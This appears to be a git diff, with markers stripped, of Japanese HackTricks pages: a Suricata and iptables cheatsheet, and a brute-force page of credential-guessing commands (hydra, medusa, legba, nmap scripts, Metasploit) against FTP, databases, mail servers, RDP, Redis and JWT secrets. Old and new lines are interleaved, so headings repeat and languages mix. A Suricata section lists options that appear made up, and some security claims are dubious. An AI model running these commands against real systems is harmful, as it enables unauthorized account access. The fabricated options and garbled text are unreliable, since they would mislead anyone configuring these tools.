generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md
View file

@ -2,13 +2,13 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するに、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricks で企業を宣伝**してみたいですか?または、**PEASS の最新バージョンを入手したり、HackTricks を PDF でダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
* [**公式 PEASS & HackTricks スウェグ**](https://peass.creator-spring.com) を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discord グループ**に**参加**するか、[**telegram グループ**](https://t.me/peass)に参加するか、**Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks) [hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud)** PR を提出してください。
</details>
@ -16,11 +16,13 @@
### チェーン
Iptablesのチェーンは、順番に処理されるルールのリストです。以下の3つは常に存在しますが、NATなどの他のチェーンもサポートされている場合があります。
iptables では、チェーンとして知られるルールのリストが順次処理されます。これらの中で、3 つの主要なチェーンが普遍的に存在し、システムの機能に応じて NAT のような追加のチェーンがサポートされる場合があります。
* **Input** - このチェーンは、受信接続の動作を制御するために使用されます。
* **Forward** - このチェーンは、ローカルに配信されていない受信接続に使用されます。ルーターのように考えてください - データは常に送信されていますが、実際にはルーター自体に宛てられているわけではありません。データは単に目的地に転送されます。ルーティング、NAT、または他のシステムで転送が必要な場合を除いて、このチェーンは使用しません。
* **Output** - このチェーンは、送信接続に使用されます。
- **Input チェーン**:着信接続の動作を管理するために使用されます。
- **Forward チェーン**ローカルシステムに向けられていない着信接続を処理するために使用されます。これは、データを他の宛先に転送する必要があるデバイスで一般的であり、システムがルーティング、NAT、または類似の活動に関与している場合に主に関連します。
- **Output チェーン**:送信接続の規制に専念します。
これらのチェーンはネットワークトラフィックの整然な処理を確保し、システムにデータの流れを詳細に規定するルールを指定することを可能にします。
```bash
# Delete all rules
iptables -F
@ -59,131 +61,7 @@ iptables-restore < /etc/sysconfig/iptables
```
## Suricata
### インストールと設定
#### インストール
Suricataをインストールするには、次のコマンドを使用します。
```bash
sudo apt-get install suricata
```
#### 設定
Suricataの設定ファイルは、通常`/etc/suricata/suricata.yaml`にあります。以下のコマンドを使用して、設定ファイルを編集します。
```bash
sudo nano /etc/suricata/suricata.yaml
```
設定ファイルを編集する際には、次の項目に注意してください。
- `HOME_NET`:ネットワークの範囲を指定します。デフォルトでは、`[192.168.0.0/16,10.0.0.0/8,172.16.0.0/12]`が設定されています。
- `EXTERNAL_NET`:外部ネットワークの範囲を指定します。デフォルトでは、`!$HOME_NET`が設定されています。
- `RULE_PATHS`:ルールファイルのパスを指定します。デフォルトでは、`/etc/suricata/rules`が設定されています。
設定を変更した後は、Suricataを再起動する必要があります。
```bash
sudo service suricata restart
```
### インターフェースの監視
Suricataを特定のインターフェースで実行するには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -i <interface>
```
`<interface>`には、監視するインターフェースの名前を指定します。
### ログの表示
Suricataのログは、デフォルトでは`/var/log/suricata/fast.log`に保存されます。次のコマンドを使用して、ログを表示します。
```bash
sudo tail -f /var/log/suricata/fast.log
```
### イベントの表示
Suricataが検出したイベントを表示するには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -T
```
### イベントのフィルタリング
Suricataのイベントをフィルタリングするには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -r <pcap_file> "filter"
```
`<pcap_file>`には、解析するPCAPファイルのパスを指定します。`"filter"`には、適用するフィルターを指定します。
### イベントの解析
Suricataのイベントを解析するには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -r <pcap_file> -l <output_directory>
```
`<pcap_file>`には、解析するPCAPファイルのパスを指定します。`<output_directory>`には、解析結果を保存するディレクトリのパスを指定します。
### イベントのエクスポート
Suricataのイベントをエクスポートするには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -r <pcap_file> -l <output_directory> --output <output_format>
```
`<pcap_file>`には、解析するPCAPファイルのパスを指定します。`<output_directory>`には、解析結果を保存するディレクトリのパスを指定します。`<output_format>`には、エクスポートする形式を指定します。
### イベントの統計情報
Suricataのイベントの統計情報を表示するには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -r <pcap_file> -l <output_directory> --stats
```
`<pcap_file>`には、解析するPCAPファイルのパスを指定します。`<output_directory>`には、解析結果を保存するディレクトリのパスを指定します。
### イベントの比較
Suricataのイベントを比較するには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -r <pcap_file1> -r <pcap_file2> --compare
```
`<pcap_file1>`と`<pcap_file2>`には、比較する2つのPCAPファイルのパスを指定します。
### イベントの統合
Suricataのイベントを統合するには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -r <pcap_file1> -r <pcap_file2> --merge
```
`<pcap_file1>`と`<pcap_file2>`には、統合する2つのPCAPファイルのパスを指定します。
### イベントのフィルタリングと解析
Suricataのイベントをフィルタリングして解析するには、次のコマンドを使用します。
```bash
sudo suricata -c /etc/suricata/suricata.yaml -r <pcap_file> -l <output_directory> --filter <filter> --output <output_format>
```
`<pcap_file>`には、解析するPCAPファイルのパスを指定します。`<output_directory>`には、解析結果を保存するディレクトリのパスを指定します。`<filter>`には、適用するフィルターを指定します。`<output_format>`には、エクスポートする形式を指定します。
### インストール&設定
```bash
# Install details from: https://suricata.readthedocs.io/en/suricata-6.0.0/install.html#install-binary-packages
# Ubuntu
@ -251,45 +129,45 @@ systemctl daemon-reload
```
### ルールの定義
ルール/シグネチャは以下の要素で構成されます:
[ドキュメントから:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) ルール/シグネチャは以下で構成されます:
* **アクション**:シグネチャが一致した場合に何が起こるかを決定します。
* **ヘッダ**ルールのプロトコル、IPアドレス、ポート、方向を定義します。
* **ルールオプション**:ルールの詳細を定義します。
* **アクション**:シグネチャが一致したときに何が起こるかを決定します。
* **ヘッダー**プロトコル、IPアドレス、ポート、およびルールの方向を定義します。
* **ルールオプション**:ルールの具体的な内容を定義します。
```bash
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"HTTP GET Request Containing Rule in URI"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"rule"; fast_pattern; classtype:bad-unknown; sid:123; rev:1;)
```
#### **有効なアクションは**
![](<../../../.gitbook/assets/image (642) (3).png>)
#### **有効なアクションは以下の通りです**
* alert - アラートを生成します
* pass - パケットのさらなる検査を停止します
* **drop** - パケットを破棄し、アラートを生成します
* **reject** - 一致するパケットの送信元にRST/ICMP unreachableエラーを送信します。
* rejectsrc - _reject_ と同じです
* rejectdst - 一致するパケットの受信者にRST/ICMPエラーパケットを送信します。
* rejectboth - 会話の両側にRST/ICMPエラーパケットを送信します。
* alert - アラートを生成する
* pass - パケットのさらなる検査を停止する
* **drop** - パケットを破棄してアラートを生成する
* **reject** - 一致するパケットの送信元にRST/ICMP到達不能エラーを送信する
* rejectsrc - 単に _reject_ と同じ
* rejectdst - 一致するパケットの受信者にRST/ICMPエラーパケットを送信する
* rejectboth - 会話の両側にRST/ICMPエラーパケットを送信する
#### **プロトコル**
* tcptcpトラフィック用
* tcp (tcpトラフィック用)
* udp
* icmp
* ipipは「all」または「any」を表します
* _layer7プロトコル_http、ftp、tls、smb、dns、ssh...[**ドキュメント**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html)に詳細あり)
* ip (ipは 'all' または 'any' を表す)
* _layer7プロトコル_: http, ftp, tls, smb, dns, ssh... (詳細は[**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html)を参照)
#### 送信元と宛先のアドレス
#### 送信元および宛先アドレス
IP範囲、否定、アドレスのリストをサポートしています
IP範囲、否定、アドレスのリストをサポートしています:
| 例 | 意味 |
| 例 | 意味 |
| ------------------------------ | ---------------------------------------- |
| ! 1.1.1.1 | 1.1.1.1以外のすべてのIPアドレス |
| !\[1.1.1.1, 1.1.1.2] | 1.1.1.11.1.1.2以外のすべてのIPアドレス |
| $HOME\_NET | yamlでのHOME\_NETの設定 |
| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NETでありHOME\_NETでない |
| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24で10.0.0.5を除く |
| !\[1.1.1.1, 1.1.1.2] | 1.1.1.1および1.1.1.2以外のすべてのIPアドレス |
| $HOME\_NET | yamlでのHOME\_NETの設定 |
| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NETおよびHOME\_NET以外 |
| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24、ただし10.0.0.5を除く |
#### 送信元と宛先のポート
#### 送信元および宛先ポート
ポート範囲、否定、ポートのリストをサポートしています
@ -298,21 +176,21 @@ IP範囲、否定、アドレスのリストをサポートしています
| any | 任意のアドレス |
| \[80, 81, 82] | ポート80、81、82 |
| \[80: 82] | 80から82までの範囲 |
| \[1024: ] | 1024から最大のポート番号まで |
| !80 | ポート80以外のすべてのポート |
| \[80:100,!99] | 80から100までの範囲で99を除く |
| \[1:80,!\[2,4]] | 1から80までの範囲でポート2と4を除く |
| \[1024: ] | 1024から最も高いポート番号まで |
| !80 | ポート80以外 |
| \[80:100,!99] | 80から100までの範囲、ただし99は除外 |
| \[1:80,!\[2,4]] | 1から80までの範囲、ただしポート2および4は除外 |
#### 方向
適用される通信ルールの方向を示すことができます:
適用される通信ルールの方向を示すことが可能です:
```
source -> destination
source <> destination (both directions)
```
#### キーワード
Suricataには、探している特定のパケットを検索するための数百のオプションがあります。ここでは、興味深いものが見つかった場合にそれを示します。詳細については、[ドキュメント](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html)をチェックしてください!
Suricataには**数百のオプション**があり、探している**特定のパケット**を検索するためのオプションがたくさんあります。興味深いものが見つかった場合はここに記載されます。詳細は[**ドキュメント**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html)を参照してください!
```bash
# Meta Keywords
msg: "description"; #Set a description to the rule
@ -357,10 +235,10 @@ drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;)
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するに、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**してみたいですか?または**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、当社の独占的な[NFTコレクション**](https://opensea.io/collection/the-peass-family)
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有**するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
</details>

203
generic-methodologies-and-resources/brute-force.md
View file

@ -24,7 +24,7 @@ HackTricksをサポートする他の方法
## デフォルトの資格情報
使用されている技術のデフォルトの資格情報を検索するか、次のリンクを試してみてください:
使用されている技術のデフォルトの資格情報を検索するか、次のリンクを試してください:
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
@ -41,7 +41,7 @@ HackTricksをサポートする他の方法
## **独自の辞書を作成する**
ターゲットに関する情報をできるだけ多く見つけ、カスタム辞書を生成します。役立つツール:
ターゲットに関する情報をできるだけ見つけ、カスタム辞書を生成します。役立つツール:
### Crunch
```bash
@ -56,7 +56,7 @@ crunch 6 8 -t ,@@^^%%
```
### Cewl
Cewlは、Webサイトから単語リストを生成するためのツールです。これは、Webサイトのテキストを解析し、一意の単語を抽出してリスト化します。これにより、ブルートフォース攻撃やパスワードスプレー攻撃で使用するためのカスタムワードリストを作成できます。
Cewl is a tool used to generate custom wordlists by crawling a target's website and extracting unique words. It can be helpful in creating wordlists for brute-forcing attacks.
```bash
cewl example.com -m 5 -w words.txt
```
@ -68,7 +68,7 @@ python3 cupp.py -h
```
### [Wister](https://github.com/cycurity/wister)
特定のターゲットに関して使用するための一意で理想的なワードリストを作成するために、与えられた単語から複数のバリエーションを作成することができるワードリストジェネレーターツールです
特定のターゲットに関して使用するための一意で理想的なワードリストを作成するために、与えられた単語から複数のバリエーションを作成することができるツールであるワードリストジェネレーターツール。
```bash
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
@ -126,11 +126,11 @@ msf> run
```
### AJP
AJPApache JServ Protocolは、Apache Tomcatサーバーと連携するためのプロトコルです。AJPを使用して、Tomcatサーバーに対してBrute Force攻撃を行うことができます。Brute Force攻撃は、総当たり攻撃とも呼ばれ、パスワードやトークンなどの認証情報を破るために使用されます。
AJPApache JServ Protocolは、Apache Tomcatサーバーとの通信に使用されるプロトコルです。AJPを介してTomcatサーバーに対してBrute Force攻撃を行うことができます。Brute Force攻撃は、総当たり攻撃とも呼ばれ、パスワードやトークンなどの認証情報を破るために使用されます。AJPプロトコルを介してBrute Force攻撃を行うことで、システムへの不正アクセスを試みることができます。
```bash
nmap --script ajp-brute -p 8009 <IP>
```
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
## AMQP (ActiveMQ、RabbitMQ、Qpid、JORAMおよびSolace)
```bash
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
```
@ -142,7 +142,7 @@ legba scylla --username cassandra --password wordlists/passwords.txt --target lo
```
### CouchDB
CouchDBは、データベースに対するブルートフォース攻撃を防ぐために、`max_document_size`と`max_attachment_size`の設定を使用します。これらの設定を適切に構成することで、過剰な負荷や悪意のある攻撃からデータベースを保護することができます。
CouchDBは、データベースに対するブルートフォース攻撃を防ぐために、`max_document_size`と`max_request_size`の設定を使用します。これらの設定を適切に構成することで、過剰な負荷や悪意のある攻撃からデータベースを保護することができます。
```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
@ -161,18 +161,18 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordl
```
### FTP
FTPFile Transfer Protocolは、ファイルをサーバーとクライアント間で転送するためのプロトコルです。FTPサーバーへの不正アクセスを試みる際には、Brute Force攻撃が一般的に使用されます。Brute Force攻撃は、辞書攻撃やランダムなパスワードの組み合わせを使用して、FTPサーバーにログインするための正しいパスワードを見つけようとします。Brute Force攻撃は、自動化ツールを使用して大量のパスワードを試行することで、効率的に実行されます。FTPサーバーのセキュリティを向上させるためには、強力なパスワードポリシーを実装し、アカウントロックアウト機能を有効にすることが重要です。
FTPFile Transfer Protocolは、ファイルをサーバーとクライアント間で転送するためのプロトコルです。FTPサーバーへの不正アクセスを試みる際には、Brute Force攻撃が一般的に使用されます。Brute Force攻撃は、辞書攻撃やランダムなパスワードの組み合わせを使用して、FTPサーバーにログインするための正しいパスワードを見つけようとします。Brute Force攻撃は、自動化ツールを使用して大量のパスワードを試行することで、成功する可能性を高めます。FTPサーバーのセキュリティを向上させるためには、強力なパスワードポリシーを実装し、アカウントロックアウト機能を有効にすることが重要です。
```bash
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
```
### HTTPジェネリックブルート
### HTTP ジェネリックブルート
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
### HTTPベーシック認証
### HTTP ベーシック認証
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
@ -181,7 +181,7 @@ legba http.basic --username admin --password wordlists/passwords.txt --target ht
```
### HTTP - NTLM
NTLMNT LAN Managerは、Windowsベースのシステムで使用される認証プロトコルです。NTLM認証をバイパスするために、ブルートフォース攻撃を使用することができます。NTLM認証のブルートフォース攻撃は、ユーザーのパスワードを破るために総当たり攻撃を行います。
NTLM認証は、Windowsベースのシステムで一般的に使用される認証プロトコルです。NTLM認証をバイパスするために、辞書攻撃や総当たり攻撃を使用することができます。
```bash
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
@ -200,7 +200,7 @@ cmsmap -f W/J/D/M -u a -p a https://wordpress.com
```
### IMAP
IMAPInternet Message Access Protocolは、電子メールを受信するためのプロトコルです。IMAPサーバーに対してブルートフォース攻撃を行うことで、ユーザーのメールボックスにアクセスすることが可能です。IMAPサーバーへのブルートフォース放送は、一般的にユーザー名とパスワードの組み合わせを総当たりで試行することで行われます。
IMAP (Internet Message Access Protocol) is a widely used protocol for email retrieval. It operates over port 143 and allows users to access their email on a remote server. IMAP is often targeted in brute force attacks to gain unauthorized access to email accounts.
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
@ -209,7 +209,7 @@ legba imap --username user --password data/passwords.txt --target localhost:993
```
### IRC
IRCInternet Relay Chatは、オープンソースのチャットプロトコルであり、テキストベースの通信を可能にします。IRCサーバーに接続するためには、通常はIRCクライアントソフトウェアが必要です。IRCは、チャット、ファイル転送、および他のさまざまな活動に使用されます。
IRCInternet Relay Chatは、オープンソースのチャットプロトコルであり、テキストベースのコミュニケーションを可能にします。IRCサーバーに対してブルートフォース攻撃を行うことで、ユーザー名やパスワードを推測しようとする攻撃があります。
```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
```
@ -221,7 +221,7 @@ nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/va
```
### JWT
JWTJSON Web Tokenは、認証や情報の交換に使用されるコンパクトで自己完結型の方法です。JWTは、ヘッダー、ペイロード、および署名から構成されています。JWTの署名を検証するためには、公開鍵が必要です。JWTのブルートフォース攻撃は、署名の検証に使用される鍵を推測することを試みるものです。
JWTJSON Web Tokenは、認証や情報の交換に使用されるコンパクトで自己完結型の方法です。JWTは、ヘッダー、ペイロード、および署名から構成されています。JWTの署名を検証するために、ブルートフォース攻撃が使用されることがあります。
```bash
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
@ -246,7 +246,7 @@ jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibm
```
### LDAP
LDAPLightweight Directory Access Protocolは、ディレクトリサービスにアクセスするためのプロトコルです。LDAPサーバーに対してBrute Force攻撃を行うことで、有効なユーザー名やパスワードを特定することができます。Brute Force攻撃は、自動化ツールを使用して、短時間で大量の認証試行を行う方法です。
LDAPLightweight Directory Access Protocolは、ディレクトリサービスにアクセスするためのプロトコルです。LDAPサーバーに対してブルートフォース攻撃を行うことで、ユーザー名やパスワードなどの情報を取得することができます。
```bash
nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
@ -259,6 +259,8 @@ ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
```
### Mongo
MongoDBは、データベースに対するBrute Force攻撃に対して脆弱な場合があります。攻撃者は、一連のパスワードを試行し、正しい認証情報を見つけることができます。これを防ぐためには、強力なパスワードポリシーを実装し、アカウントロックアウト機能を有効にすることが重要です。
```bash
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
@ -272,7 +274,7 @@ legba mssql --username SA --password wordlists/passwords.txt --target localhost:
```
### MySQL
### MySQL
MySQLは、多くのWebアプリケーションで使用される人気のあるデータベース管理システムです。Brute force攻撃は、MySQLデータベースに対しても効果的な攻撃手法の1つです。Brute force攻撃では、辞書攻撃やランダムなパスワードの組み合わせを使用して、MySQLデータベースにアクセスしようとします。MySQLのBrute force攻撃を防ぐためには、強力なパスワードポリシーを実装し、アカウントロックアウト機能を有効にすることが重要です。
```bash
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql
@ -288,7 +290,9 @@ legba mysql --username root --password wordlists/passwords.txt --target localhos
```
### OracleSQL
Brute-force attacks against Oracle databases can be performed using tools such as Hydra or custom scripts. These attacks typically involve trying different combinations of usernames and passwords until the correct one is found. It is important to note that brute-force attacks can be time-consuming and may trigger account lockouts or alarms if too many failed attempts are made.
### OracleSQL
Brute force attacks against Oracle databases can be performed using tools such as Hydra or Metasploit. These tools can help automate the process of trying different username and password combinations until the correct one is found. It is important to note that brute force attacks can be time-consuming and may not always be successful, especially if strong passwords are in place. Additionally, brute force attacks can generate a high volume of traffic, which may be detected by intrusion detection systems.
```bash
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
@ -316,15 +320,13 @@ legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin -
```bash
pip3 install cx_Oracle --upgrade
```
[オフラインOracleSQLハッシュブルートフォース](../network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**バージョン11.1.0.6、11.1.0.7、11.2.0.1、11.2.0.2**、および**11.2.0.3**)
[オフラインOracleSQLハッシュブルートフォース](../network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force)**バージョン11.1.0.6、11.1.0.7、11.2.0.1、11.2.0.2**、および**11.2.0.3**:
```bash
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
```
### POP
### POP
POPPost Office Protocolは、電子メールを受信するためのプロトコルです。POP攻撃は、辞書攻撃や総当たり攻撃を使用して、電子メールアカウントのパスワードを破ることを試みます。
POPPost Office Protocolは、電子メールを受信するために使用されるプロトコルです。POP攻撃は、辞書攻撃や総当たり攻撃などの手法を使用して、パスワードを推測し、メールアカウントにアクセスすることを試みます。
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
@ -337,7 +339,7 @@ legba pop3 --username admin@example.com --password wordlists/passwords.txt --tar
```
### PostgreSQL
PostgreSQLは、データベースへのアクセスを破るためのBrute Force攻撃に対して非常に耐性があります。しかし、一般的なBrute Force攻撃は、ユーザー名とパスワードの組み合わせを総当たりで試行することによって行われるため、強力なパスワードポリシーを実装することが重要です。また、IPアドレスを制限するなどの追加のセキュリティ対策を講じることも推奨されます。
PostgreSQLは、データベースへのアクセスを試みる際にBrute Force攻撃を使用することができます。Brute Force攻撃は、総当たり攻撃とも呼ばれ、すべての可能な組み合わせを試すことで正しい認証情報を見つけることを目的としています。これにより、不正アクセスを試みる攻撃者がデータベースにアクセスする可能性があります。Brute Force攻撃からデータベースを保護するためには、強力なパスワードポリシーを実装し、アカウントロックアウト機能を有効にすることが重要です。
```bash
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
@ -349,7 +351,7 @@ legba pgsql --username admin --password wordlists/passwords.txt --target localho
```
### PPTP
[https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)からインストール用の`.deb`パッケージをダウンロードできます。
[https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) からインストール用の `.deb` パッケージをダウンロードできます。
```bash
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>
@ -362,7 +364,7 @@ legba rdp --target localhost:3389 --username admin --password data/passwords.txt
```
### Redis
Redisは、デフォルトでパスワードを持たないため、Brute Force攻撃に対して脆弱です。強力なパスワードを設定することで、攻撃を防ぐことができます。
RedisRemote Dictionary Serverは、高速なキー/値データベースであり、多くのWebアプリケーションで使用されています。Redisサーバーに対するBrute Force攻撃は、一般的な攻撃手法の1つです。Brute Force攻撃は、辞書ワードリストやランダムな文字列を使用して、パスワードや認証情報を猜出するために大量の試行を行う攻撃手法です。Redisサーバーに対するBrute Force攻撃を防ぐためには、強力なパスワードポリシーを実装し、アクセス制御リストACLを適切に構成することが重要です。
```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
@ -371,29 +373,19 @@ legba redis --target localhost:6379 --username admin --password data/passwords.t
```
### Rexec
Rexecは、リモートシステムに対してBrute Force攻撃を行うためのツールです。このツールは、ユーザー名とパスワードのリストを使用して、リモートシステムに対して総当たり攻撃を実行します。Rexecは、ネットワークの脆弱性を悪用して不正アクセスを試みる際に使用されることがあります。
Rexecは、リモートシステムに対してBrute Force攻撃を行うためのツールです。このツールは、ユーザー名とパスワードの組み合わせを総当たりで試行し、正しい認証情報を見つけることを目的としています。Rexecを使用する際には、アカウントロックアウトやログの監視などのセキュリティ対策が重要です。
```bash
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
```
### Rlogin
